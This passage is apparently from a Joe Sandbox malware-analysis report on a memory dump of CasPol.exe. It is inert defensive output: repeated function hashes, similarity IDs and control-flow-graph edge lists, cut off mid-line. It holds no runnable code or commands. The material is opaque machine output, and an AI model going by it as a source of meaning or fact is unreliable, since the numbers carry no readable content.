                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: afeb1dd948b553a25caf71e364417a89a33b9387c425cb6194a3d0fc5538ae41
                                                                                      • Instruction ID: 16ffcaa592d27f524f567e364e9e05f7ae9f2064b26455d6666e8e7182f23527
                                                                                      • Opcode Fuzzy Hash: afeb1dd948b553a25caf71e364417a89a33b9387c425cb6194a3d0fc5538ae41
                                                                                      • Instruction Fuzzy Hash: 664229B4A00224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046DCF Relevance: 2.0, APIs: 1, Instructions: 525libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: c0caa200d7b4f147ea7f8f427948305ad482ec2d36110ef682b231aed334452f
                                                                                      • Instruction ID: 9f7b3ecac634dca0ca04e84f96c9c3ae5a4824d6f07b596173f21151a53b0478
                                                                                      • Opcode Fuzzy Hash: c0caa200d7b4f147ea7f8f427948305ad482ec2d36110ef682b231aed334452f
                                                                                      • Instruction Fuzzy Hash: 8F4229B4A01224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E81CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046E16 Relevance: 2.0, APIs: 1, Instructions: 518libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 9617 1046e16-1046e7a 9950 1046e7a call 1519917 9617->9950 9951 1046e7a call 15197b9 9617->9951 9952 1046e7a call 15198b8 9617->9952 9624 1046e80-1046ec1 9957 1046ec1 call 1519979 9624->9957 9958 1046ec1 call 15199d8 9624->9958 9627 1046ec7-1046f08 9961 1046f08 call 1519c11 9627->9961 9962 1046f08 call 1519979 9627->9962 9963 1046f08 call 15199d8 9627->9963 9964 1046f08 call 1519ea8 9627->9964 9630 1046f0e-1046f4f 9969 1046f4f call 151a290 9630->9969 9970 1046f4f call 151a2a0 9630->9970 9633 1046f55-1046f96 9980 1046f96 call 151a290 9633->9980 9981 1046f96 call 151a2a0 9633->9981 9982 1046f96 call 151a6b0 9633->9982 9636 1046f9c-1046fdd 9985 1046fdd call 151a978 9636->9985 9986 1046fdd call 151a9d8 9636->9986 9639 1046fe3-104703a 9994 104703a call 151adf0 9639->9994 9995 104703a call 151aea0 9639->9995 9996 104703a call 151aeff 9639->9996 9643 1047040-1047084 9932 1047084 call 151af60 9643->9932 9933 1047084 call 151afc0 9643->9933 9646 104708a-1047105 9943 104710b call 151b4b4 9646->9943 9944 104710b call 151b3e8 9646->9944 9945 104710b call 151b388 9646->9945 9653 1047111-1047133 9946 1047135 call 151b570 9653->9946 9947 1047135 call 151b580 9653->9947 9948 1047135 call 151b4b4 9653->9948 9949 1047135 call 151b744 9653->9949 9657 104713b-1047161 9953 1047163 call 151b570 9657->9953 9954 1047163 call 151b580 9657->9954 9955 1047163 call 151b4b4 9657->9955 9956 1047163 call 151b744 9657->9956 9661 1047169-104718f 9965 1047191 call 151b570 9661->9965 9966 1047191 call 151b580 9661->9966 9967 1047191 call 151b4b4 9661->9967 9968 1047191 call 151b744 9661->9968 9665 1047197-10471bd 9976 10471bf call 151b570 9665->9976 9977 10471bf call 151b580 9665->9977 9978 10471bf call 151b4b4 9665->9978 9979 10471bf call 151b744 9665->9979 9669 10471c5-10471eb 9987 10471ed call 151b570 9669->9987 9988 10471ed call 151b580 9669->9988 9989 10471ed call 151b4b4 9669->9989 9990 10471ed call 151b744 9669->9990 9673 10471f3-104725f LdrInitializeThunk 9674 1047265-1047289 9673->9674 9675 1047588 9673->9675 9680 10473e2-1047406 9674->9680 9681 104728f 9674->9681 9991 1047588 call 151bb50 9675->9991 9992 1047588 call 151bab0 9675->9992 9993 1047588 call 151baa0 9675->9993 9677 104758e-10476c6 9934 10476c6 call 151ccf0 9677->9934 9935 10476c6 call 151cc90 9677->9935 9689 104740c-104740e 9680->9689 9690 1047408 9680->9690 9681->9680 9682 1047295-10473dd 9681->9682 9682->9675 9694 1047415-104743f 9689->9694 9692 1047410 9690->9692 9693 104740a 9690->9693 9692->9694 9693->9689 9704 1047445-1047447 9694->9704 9705 1047441 9694->9705 9709 104744e-1047454 9704->9709 9707 1047443 9705->9707 9708 1047449 9705->9708 9707->9704 9708->9709 9709->9675 9711 104745a-104755d 9709->9711 9711->9675 9721 10476cc-1047798 9971 1047798 call 151da32 9721->9971 9972 1047798 call 151da88 9721->9972 9744 104779e-104782c 9936 104782c call 151dd50 9744->9936 9937 104782c call 151da32 9744->9937 9938 104782c call 151e2b7 9744->9938 9939 104782c call 151dce6 9744->9939 9940 104782c call 151da88 9744->9940 9941 104782c call 151df98 9744->9941 9942 104782c call 151e158 9744->9942 9760 1047832-10478b4 9959 10478b4 call 151e450 9760->9959 9960 10478b4 call 151e4b0 9760->9960 9773 10478ba-104793c 9973 104793c call 151ee90 9773->9973 9974 104793c call 151edec 9773->9974 9975 104793c call 151eeef 9773->9975 9779 1047942-1047986 9983 1047986 call 151ef50 9779->9983 9984 1047986 call 151efb0 9779->9984 9782 104798c-1047b40 9800 1047b46-1047b69 9782->9800 9801 1047e4b-1047e5c 9782->9801 9815 1047e33-1047e48 9800->9815 9816 1047b6f-1047be1 9800->9816 9804 10481c7-10481ce 9801->9804 9805 1047e62-1047e69 9801->9805 9808 10481d4-1048245 9804->9808 9809 1048250-104825a 9804->9809 9806 1047f02-1047f09 9805->9806 9807 1047e6f-1047ec3 9805->9807 9811 1047f0f-1048054 call 1045aa0 call 10456a8 9806->9811 9812 104807b-1048082 9806->9812 9857 1047ecf 9807->9857 9808->9809 9813 10482a0-10482b2 9809->9813 9814 104825c-1048299 9809->9814 9811->9804 9812->9804 9817 1048088-10481a8 call 1045aa0 call 10456a8 call 10456f0 9812->9817 9814->9813 9815->9801 9845 1047be7-1047bee 9816->9845 9846 1047e1b-1047e2d 9816->9846 9817->9804 9850 1047bf4-1047d12 9845->9850 9851 1047d17-1047d42 9845->9851 9846->9815 9846->9816 9850->9846 9851->9846 9856 1047d48-1047df0 9851->9856 9856->9846 9857->9804 9932->9646 9933->9646 9934->9721 9935->9721 9936->9760 9937->9760 9938->9760 9939->9760 9940->9760 9941->9760 9942->9760 9943->9653 9944->9653 9945->9653 9946->9657 9947->9657 9948->9657 9949->9657 9950->9624 9951->9624 9952->9624 9953->9661 9954->9661 9955->9661 9956->9661 9957->9627 9958->9627 9959->9773 9960->9773 9961->9630 9962->9630 9963->9630 9964->9630 9965->9665 9966->9665 9967->9665 9968->9665 9969->9633 9970->9633 9971->9744 9972->9744 9973->9779 9974->9779 9975->9779 9976->9669 9977->9669 9978->9669 9979->9669 9980->9636 9981->9636 9982->9636 9983->9782 9984->9782 9985->9639 9986->9639 9987->9673 9988->9673 9989->9673 9990->9673 9991->9677 9992->9677 9993->9677 9994->9643 9995->9643 9996->9643
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: c6cc2f46683b416a803cb3164408be728d294de8ab317e02681fddddf95429a3
                                                                                      • Instruction ID: 0fde9af43c985c04a3e05e63ae56e753d4affa442d7117a39bf6e5dd9cb2f69f
                                                                                      • Opcode Fuzzy Hash: c6cc2f46683b416a803cb3164408be728d294de8ab317e02681fddddf95429a3
                                                                                      • Instruction Fuzzy Hash: 4B3229B4A01224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E81CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046E5D Relevance: 2.0, APIs: 1, Instructions: 509libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 9997 1046e5d-1046e7a 10327 1046e7a call 1519917 9997->10327 10328 1046e7a call 15197b9 9997->10328 10329 1046e7a call 15198b8 9997->10329 10001 1046e80-1046ec1 10334 1046ec1 call 1519979 10001->10334 10335 1046ec1 call 15199d8 10001->10335 10004 1046ec7-1046f08 10338 1046f08 call 1519c11 10004->10338 10339 1046f08 call 1519979 10004->10339 10340 1046f08 call 15199d8 10004->10340 10341 1046f08 call 1519ea8 10004->10341 10007 1046f0e-1046f4f 10346 1046f4f call 151a290 10007->10346 10347 1046f4f call 151a2a0 10007->10347 10010 1046f55-1046f96 10357 1046f96 call 151a290 10010->10357 10358 1046f96 call 151a2a0 10010->10358 10359 1046f96 call 151a6b0 10010->10359 10013 1046f9c-1046fdd 10366 1046fdd call 151a978 10013->10366 10367 1046fdd call 151a9d8 10013->10367 10016 1046fe3-104703a 10368 104703a call 151adf0 10016->10368 10369 104703a call 151aea0 10016->10369 10370 104703a call 151aeff 10016->10370 10020 1047040-1047084 10311 1047084 call 151af60 10020->10311 10312 1047084 call 151afc0 10020->10312 10023 104708a-1047105 10320 104710b call 151b4b4 10023->10320 10321 104710b call 151b3e8 10023->10321 10322 104710b call 151b388 10023->10322 10030 1047111-1047133 10323 1047135 call 151b570 10030->10323 10324 1047135 call 151b580 10030->10324 10325 1047135 call 151b4b4 10030->10325 10326 1047135 call 151b744 10030->10326 10034 104713b-1047161 10330 1047163 call 151b570 10034->10330 10331 1047163 call 151b580 10034->10331 10332 1047163 call 151b4b4 10034->10332 10333 1047163 call 151b744 10034->10333 10038 1047169-104718f 10342 1047191 call 151b570 10038->10342 10343 1047191 call 151b580 10038->10343 10344 1047191 call 151b4b4 10038->10344 10345 1047191 call 151b744 10038->10345 10042 1047197-10471bd 10348 10471bf call 151b570 10042->10348 10349 10471bf call 151b580 10042->10349 10350 10471bf call 151b4b4 10042->10350 10351 10471bf call 151b744 10042->10351 10046 10471c5-10471eb 10362 10471ed call 151b570 10046->10362 10363 10471ed call 151b580 10046->10363 10364 10471ed call 151b4b4 10046->10364 10365 10471ed call 151b744 10046->10365 10050 10471f3-104725f LdrInitializeThunk 10051 1047265-1047289 10050->10051 10052 1047588 10050->10052 10057 10473e2-1047406 10051->10057 10058 104728f 10051->10058 10371 1047588 call 151bb50 10052->10371 10372 1047588 call 151bab0 10052->10372 10373 1047588 call 151baa0 10052->10373 10054 104758e-10476c6 10309 10476c6 call 151ccf0 10054->10309 10310 10476c6 call 151cc90 10054->10310 10066 104740c-104740e 10057->10066 10067 1047408 10057->10067 10058->10057 10059 1047295-10473dd 10058->10059 10059->10052 10071 1047415-104743f 10066->10071 10069 1047410 10067->10069 10070 104740a 10067->10070 10069->10071 10070->10066 10081 1047445-1047447 10071->10081 10082 1047441 10071->10082 10086 104744e-1047454 10081->10086 10084 1047443 10082->10084 10085 1047449 10082->10085 10084->10081 10085->10086 10086->10052 10088 104745a-104755d 10086->10088 10088->10052 10098 10476cc-1047798 10352 1047798 call 151da32 10098->10352 10353 1047798 call 151da88 10098->10353 10121 104779e-104782c 10313 104782c call 151dd50 10121->10313 10314 104782c call 151da32 10121->10314 10315 104782c call 151e2b7 10121->10315 10316 104782c call 151dce6 10121->10316 10317 104782c call 151da88 10121->10317 10318 104782c call 151df98 10121->10318 10319 104782c call 151e158 10121->10319 10137 1047832-10478b4 10336 10478b4 call 151e450 10137->10336 10337 10478b4 call 151e4b0 10137->10337 10150 10478ba-104793c 10354 104793c call 151ee90 10150->10354 10355 104793c call 151edec 10150->10355 10356 104793c call 151eeef 10150->10356 10156 1047942-1047986 10360 1047986 call 151ef50 10156->10360 10361 1047986 call 151efb0 10156->10361 10159 104798c-1047b40 10177 1047b46-1047b69 10159->10177 10178 1047e4b-1047e5c 10159->10178 10192 1047e33-1047e48 10177->10192 10193 1047b6f-1047be1 10177->10193 10181 10481c7-10481ce 10178->10181 10182 1047e62-1047e69 10178->10182 10185 10481d4-1048245 10181->10185 10186 1048250-104825a 10181->10186 10183 1047f02-1047f09 10182->10183 10184 1047e6f-1047ec3 10182->10184 10188 1047f0f-1048054 call 1045aa0 call 10456a8 10183->10188 10189 104807b-1048082 10183->10189 10234 1047ecf 10184->10234 10185->10186 10190 10482a0-10482b2 10186->10190 10191 104825c-1048299 10186->10191 10188->10181 10189->10181 10194 1048088-10481a8 call 1045aa0 call 10456a8 call 10456f0 10189->10194 10191->10190 10192->10178 10222 1047be7-1047bee 10193->10222 10223 1047e1b-1047e2d 10193->10223 10194->10181 10227 1047bf4-1047d12 10222->10227 10228 1047d17-1047d42 10222->10228 10223->10192 10223->10193 10227->10223 10228->10223 10233 1047d48-1047df0 10228->10233 10233->10223 10234->10181 10309->10098 10310->10098 10311->10023 10312->10023 10313->10137 10314->10137 10315->10137 10316->10137 10317->10137 10318->10137 10319->10137 10320->10030 10321->10030 10322->10030 10323->10034 10324->10034 10325->10034 10326->10034 10327->10001 10328->10001 10329->10001 10330->10038 10331->10038 10332->10038 10333->10038 10334->10004 10335->10004 10336->10150 10337->10150 10338->10007 10339->10007 10340->10007 10341->10007 10342->10042 10343->10042 10344->10042 10345->10042 10346->10010 10347->10010 10348->10046 10349->10046 10350->10046 10351->10046 10352->10121 10353->10121 10354->10156 10355->10156 10356->10156 10357->10013 10358->10013 10359->10013 10360->10159 10361->10159 10362->10050 10363->10050 10364->10050 10365->10050 10366->10016 10367->10016 10368->10020 10369->10020 10370->10020 10371->10054 10372->10054 10373->10054
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 38367d5c9fe744052a4bceee7f21f21b642d143a7ed01295ed1c2cdfd5cf108c
                                                                                      • Instruction ID: 5a0263a1b2f0afdd73035674e8f434b5e65595862a63191cac97d54262516a50
                                                                                      • Opcode Fuzzy Hash: 38367d5c9fe744052a4bceee7f21f21b642d143a7ed01295ed1c2cdfd5cf108c
                                                                                      • Instruction Fuzzy Hash: 603229B4A01224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E81CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046E9B Relevance: 2.0, APIs: 1, Instructions: 504libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 10374 1046e9b-1046ec1 10691 1046ec1 call 1519979 10374->10691 10692 1046ec1 call 15199d8 10374->10692 10378 1046ec7-1046f08 10695 1046f08 call 1519c11 10378->10695 10696 1046f08 call 1519979 10378->10696 10697 1046f08 call 15199d8 10378->10697 10698 1046f08 call 1519ea8 10378->10698 10381 1046f0e-1046f4f 10703 1046f4f call 151a290 10381->10703 10704 1046f4f call 151a2a0 10381->10704 10384 1046f55-1046f96 10714 1046f96 call 151a290 10384->10714 10715 1046f96 call 151a2a0 10384->10715 10716 1046f96 call 151a6b0 10384->10716 10387 1046f9c-1046fdd 10719 1046fdd call 151a978 10387->10719 10720 1046fdd call 151a9d8 10387->10720 10390 1046fe3-104703a 10728 104703a call 151adf0 10390->10728 10729 104703a call 151aea0 10390->10729 10730 104703a call 151aeff 10390->10730 10394 1047040-1047084 10731 1047084 call 151af60 10394->10731 10732 1047084 call 151afc0 10394->10732 10397 104708a-1047105 10742 104710b call 151b4b4 10397->10742 10743 104710b call 151b3e8 10397->10743 10744 104710b call 151b388 10397->10744 10404 1047111-1047133 10683 1047135 call 151b570 10404->10683 10684 1047135 call 151b580 10404->10684 10685 1047135 call 151b4b4 10404->10685 10686 1047135 call 151b744 10404->10686 10408 104713b-1047161 10687 1047163 call 151b570 10408->10687 10688 1047163 call 151b580 10408->10688 10689 1047163 call 151b4b4 10408->10689 10690 1047163 call 151b744 10408->10690 10412 1047169-104718f 10699 1047191 call 151b570 10412->10699 10700 1047191 call 151b580 10412->10700 10701 1047191 call 151b4b4 10412->10701 10702 1047191 call 151b744 10412->10702 10416 1047197-10471bd 10710 10471bf call 151b570 10416->10710 10711 10471bf call 151b580 10416->10711 10712 10471bf call 151b4b4 10416->10712 10713 10471bf call 151b744 10416->10713 10420 10471c5-10471eb 10721 10471ed call 151b570 10420->10721 10722 10471ed call 151b580 10420->10722 10723 10471ed call 151b4b4 10420->10723 10724 10471ed call 151b744 10420->10724 10424 10471f3-104725f LdrInitializeThunk 10425 1047265-1047289 10424->10425 10426 1047588 10424->10426 10431 10473e2-1047406 10425->10431 10432 104728f 10425->10432 10725 1047588 call 151bb50 10426->10725 10726 1047588 call 151bab0 10426->10726 10727 1047588 call 151baa0 10426->10727 10428 104758e-10476c6 10733 10476c6 call 151ccf0 10428->10733 10734 10476c6 call 151cc90 10428->10734 10440 104740c-104740e 10431->10440 10441 1047408 10431->10441 10432->10431 10433 1047295-10473dd 10432->10433 10433->10426 10445 1047415-104743f 10440->10445 10443 1047410 10441->10443 10444 104740a 10441->10444 10443->10445 10444->10440 10455 1047445-1047447 10445->10455 10456 1047441 10445->10456 10460 104744e-1047454 10455->10460 10458 1047443 10456->10458 10459 1047449 10456->10459 10458->10455 10459->10460 10460->10426 10462 104745a-104755d 10460->10462 10462->10426 10472 10476cc-1047798 10705 1047798 call 151da32 10472->10705 10706 1047798 call 151da88 10472->10706 10495 104779e-104782c 10735 104782c call 151dd50 10495->10735 10736 104782c call 151da32 10495->10736 10737 104782c call 151e2b7 10495->10737 10738 104782c call 151dce6 10495->10738 10739 104782c call 151da88 10495->10739 10740 104782c call 151df98 10495->10740 10741 104782c call 151e158 10495->10741 10511 1047832-10478b4 10693 10478b4 call 151e450 10511->10693 10694 10478b4 call 151e4b0 10511->10694 10524 10478ba-104793c 10707 104793c call 151ee90 10524->10707 10708 104793c call 151edec 10524->10708 10709 104793c call 151eeef 10524->10709 10530 1047942-1047986 10717 1047986 call 151ef50 10530->10717 10718 1047986 call 151efb0 10530->10718 10533 104798c-1047b40 10551 1047b46-1047b69 10533->10551 10552 1047e4b-1047e5c 10533->10552 10566 1047e33-1047e48 10551->10566 10567 1047b6f-1047be1 10551->10567 10555 10481c7-10481ce 10552->10555 10556 1047e62-1047e69 10552->10556 10559 10481d4-1048245 10555->10559 10560 1048250-104825a 10555->10560 10557 1047f02-1047f09 10556->10557 10558 1047e6f-1047ec3 10556->10558 10562 1047f0f-1048054 call 1045aa0 call 10456a8 10557->10562 10563 104807b-1048082 10557->10563 10608 1047ecf 10558->10608 10559->10560 10564 10482a0-10482b2 10560->10564 10565 104825c-1048299 10560->10565 10562->10555 10563->10555 10568 1048088-10481a8 call 1045aa0 call 10456a8 call 10456f0 10563->10568 10565->10564 10566->10552 10596 1047be7-1047bee 10567->10596 10597 1047e1b-1047e2d 10567->10597 10568->10555 10601 1047bf4-1047d12 10596->10601 10602 1047d17-1047d42 10596->10602 10597->10566 10597->10567 10601->10597 10602->10597 10607 1047d48-1047df0 10602->10607 10607->10597 10608->10555 10683->10408 10684->10408 10685->10408 10686->10408 10687->10412 10688->10412 10689->10412 10690->10412 10691->10378 10692->10378 10693->10524 10694->10524 10695->10381 10696->10381 10697->10381 10698->10381 10699->10416 10700->10416 10701->10416 10702->10416 10703->10384 10704->10384 10705->10495 10706->10495 10707->10530 10708->10530 10709->10530 10710->10420 10711->10420 10712->10420 10713->10420 10714->10387 10715->10387 10716->10387 10717->10533 10718->10533 10719->10390 10720->10390 10721->10424 10722->10424 10723->10424 10724->10424 10725->10428 10726->10428 10727->10428 10728->10394 10729->10394 10730->10394 10731->10397 10732->10397 10733->10472 10734->10472 10735->10511 10736->10511 10737->10511 10738->10511 10739->10511 10740->10511 10741->10511 10742->10404 10743->10404 10744->10404
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 1c52ce6803f170fd60991f62920f85c45c10737862d6c91b6397f636c2b8d0ce
                                                                                      • Instruction ID: 910be96b695b25f327c62f80f5bcabd53923f166a65b7b4be846015c896b0c1d
                                                                                      • Opcode Fuzzy Hash: 1c52ce6803f170fd60991f62920f85c45c10737862d6c91b6397f636c2b8d0ce
                                                                                      • Instruction Fuzzy Hash: 9B3229B4A01224CFCB65DF64C98879DBBB6BF88305F5084EAD50AA3344DB359E81CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046EE2 Relevance: 2.0, APIs: 1, Instructions: 497libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 10745 1046ee2-1046f08 11061 1046f08 call 1519c11 10745->11061 11062 1046f08 call 1519979 10745->11062 11063 1046f08 call 15199d8 10745->11063 11064 1046f08 call 1519ea8 10745->11064 10749 1046f0e-1046f4f 11069 1046f4f call 151a290 10749->11069 11070 1046f4f call 151a2a0 10749->11070 10752 1046f55-1046f96 11080 1046f96 call 151a290 10752->11080 11081 1046f96 call 151a2a0 10752->11081 11082 1046f96 call 151a6b0 10752->11082 10755 1046f9c-1046fdd 11089 1046fdd call 151a978 10755->11089 11090 1046fdd call 151a9d8 10755->11090 10758 1046fe3-104703a 11091 104703a call 151adf0 10758->11091 11092 104703a call 151aea0 10758->11092 11093 104703a call 151aeff 10758->11093 10762 1047040-1047084 11099 1047084 call 151af60 10762->11099 11100 1047084 call 151afc0 10762->11100 10765 104708a-1047105 11108 104710b call 151b4b4 10765->11108 11109 104710b call 151b3e8 10765->11109 11110 104710b call 151b388 10765->11110 10772 1047111-1047133 11051 1047135 call 151b570 10772->11051 11052 1047135 call 151b580 10772->11052 11053 1047135 call 151b4b4 10772->11053 11054 1047135 call 151b744 10772->11054 10776 104713b-1047161 11055 1047163 call 151b570 10776->11055 11056 1047163 call 151b580 10776->11056 11057 1047163 call 151b4b4 10776->11057 11058 1047163 call 151b744 10776->11058 10780 1047169-104718f 11065 1047191 call 151b570 10780->11065 11066 1047191 call 151b580 10780->11066 11067 1047191 call 151b4b4 10780->11067 11068 1047191 call 151b744 10780->11068 10784 1047197-10471bd 11071 10471bf call 151b570 10784->11071 11072 10471bf call 151b580 10784->11072 11073 10471bf call 151b4b4 10784->11073 11074 10471bf call 151b744 10784->11074 10788 10471c5-10471eb 11085 10471ed call 151b570 10788->11085 11086 10471ed call 151b580 10788->11086 11087 10471ed call 151b4b4 10788->11087 11088 10471ed call 151b744 10788->11088 10792 10471f3-104725f LdrInitializeThunk 10793 1047265-1047289 10792->10793 10794 1047588 10792->10794 10799 10473e2-1047406 10793->10799 10800 104728f 10793->10800 11094 1047588 call 151bb50 10794->11094 11095 1047588 call 151bab0 10794->11095 11096 1047588 call 151baa0 10794->11096 10796 104758e-10476c6 11097 10476c6 call 151ccf0 10796->11097 11098 10476c6 call 151cc90 10796->11098 10808 104740c-104740e 10799->10808 10809 1047408 10799->10809 10800->10799 10801 1047295-10473dd 10800->10801 10801->10794 10813 1047415-104743f 10808->10813 10811 1047410 10809->10811 10812 104740a 10809->10812 10811->10813 10812->10808 10823 1047445-1047447 10813->10823 10824 1047441 10813->10824 10828 104744e-1047454 10823->10828 10826 1047443 10824->10826 10827 1047449 10824->10827 10826->10823 10827->10828 10828->10794 10830 104745a-104755d 10828->10830 10830->10794 10840 10476cc-1047798 11075 1047798 call 151da32 10840->11075 11076 1047798 call 151da88 10840->11076 10863 104779e-104782c 11101 104782c call 151dd50 10863->11101 11102 104782c call 151da32 10863->11102 11103 104782c call 151e2b7 10863->11103 11104 104782c call 151dce6 10863->11104 11105 104782c call 151da88 10863->11105 11106 104782c call 151df98 10863->11106 11107 104782c call 151e158 10863->11107 10879 1047832-10478b4 11059 10478b4 call 151e450 10879->11059 11060 10478b4 call 151e4b0 10879->11060 10892 10478ba-104793c 11077 104793c call 151ee90 10892->11077 11078 104793c call 151edec 10892->11078 11079 104793c call 151eeef 10892->11079 10898 1047942-1047986 11083 1047986 call 151ef50 10898->11083 11084 1047986 call 151efb0 10898->11084 10901 104798c-1047b40 10919 1047b46-1047b69 10901->10919 10920 1047e4b-1047e5c 10901->10920 10934 1047e33-1047e48 10919->10934 10935 1047b6f-1047be1 10919->10935 10923 10481c7-10481ce 10920->10923 10924 1047e62-1047e69 10920->10924 10927 10481d4-1048245 10923->10927 10928 1048250-104825a 10923->10928 10925 1047f02-1047f09 10924->10925 10926 1047e6f-1047ec3 10924->10926 10930 1047f0f-1048054 call 1045aa0 call 10456a8 10925->10930 10931 104807b-1048082 10925->10931 10976 1047ecf 10926->10976 10927->10928 10932 10482a0-10482b2 10928->10932 10933 104825c-1048299 10928->10933 10930->10923 10931->10923 10936 1048088-10481a8 call 1045aa0 call 10456a8 call 10456f0 10931->10936 10933->10932 10934->10920 10964 1047be7-1047bee 10935->10964 10965 1047e1b-1047e2d 10935->10965 10936->10923 10969 1047bf4-1047d12 10964->10969 10970 1047d17-1047d42 10964->10970 10965->10934 10965->10935 10969->10965 10970->10965 10975 1047d48-1047df0 10970->10975 10975->10965 10976->10923 11051->10776 11052->10776 11053->10776 11054->10776 11055->10780 11056->10780 11057->10780 11058->10780 11059->10892 11060->10892 11061->10749 11062->10749 11063->10749 11064->10749 11065->10784 11066->10784 11067->10784 11068->10784 11069->10752 11070->10752 11071->10788 11072->10788 11073->10788 11074->10788 11075->10863 11076->10863 11077->10898 11078->10898 11079->10898 11080->10755 11081->10755 11082->10755 11083->10901 11084->10901 11085->10792 11086->10792 11087->10792 11088->10792 11089->10758 11090->10758 11091->10762 11092->10762 11093->10762 11094->10796 11095->10796 11096->10796 11097->10840 11098->10840 11099->10765 11100->10765 11101->10879 11102->10879 11103->10879 11104->10879 11105->10879 11106->10879 11107->10879 11108->10772 11109->10772 11110->10772
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 56a48bcd16503508dd2bbd680e9f6b378ec7eb7667540f8ebc9bcf4308d31193
                                                                                      • Instruction ID: 0dee6d53748645e5e4d414a2f22f50c462e84979d97b34d9c71cf76ab8e2053f
                                                                                      • Opcode Fuzzy Hash: 56a48bcd16503508dd2bbd680e9f6b378ec7eb7667540f8ebc9bcf4308d31193
                                                                                      • Instruction Fuzzy Hash: CA3219B4A00224CFCB65DF64C98879DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046F29 Relevance: 2.0, APIs: 1, Instructions: 490libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 11111 1046f29-1046f4f 11428 1046f4f call 151a290 11111->11428 11429 1046f4f call 151a2a0 11111->11429 11115 1046f55-1046f96 11439 1046f96 call 151a290 11115->11439 11440 1046f96 call 151a2a0 11115->11440 11441 1046f96 call 151a6b0 11115->11441 11118 1046f9c-1046fdd 11448 1046fdd call 151a978 11118->11448 11449 1046fdd call 151a9d8 11118->11449 11121 1046fe3-104703a 11450 104703a call 151adf0 11121->11450 11451 104703a call 151aea0 11121->11451 11452 104703a call 151aeff 11121->11452 11125 1047040-1047084 11458 1047084 call 151af60 11125->11458 11459 1047084 call 151afc0 11125->11459 11128 104708a-1047105 11467 104710b call 151b4b4 11128->11467 11468 104710b call 151b3e8 11128->11468 11469 104710b call 151b388 11128->11469 11135 1047111-1047133 11414 1047135 call 151b570 11135->11414 11415 1047135 call 151b580 11135->11415 11416 1047135 call 151b4b4 11135->11416 11417 1047135 call 151b744 11135->11417 11139 104713b-1047161 11418 1047163 call 151b570 11139->11418 11419 1047163 call 151b580 11139->11419 11420 1047163 call 151b4b4 11139->11420 11421 1047163 call 151b744 11139->11421 11143 1047169-104718f 11424 1047191 call 151b570 11143->11424 11425 1047191 call 151b580 11143->11425 11426 1047191 call 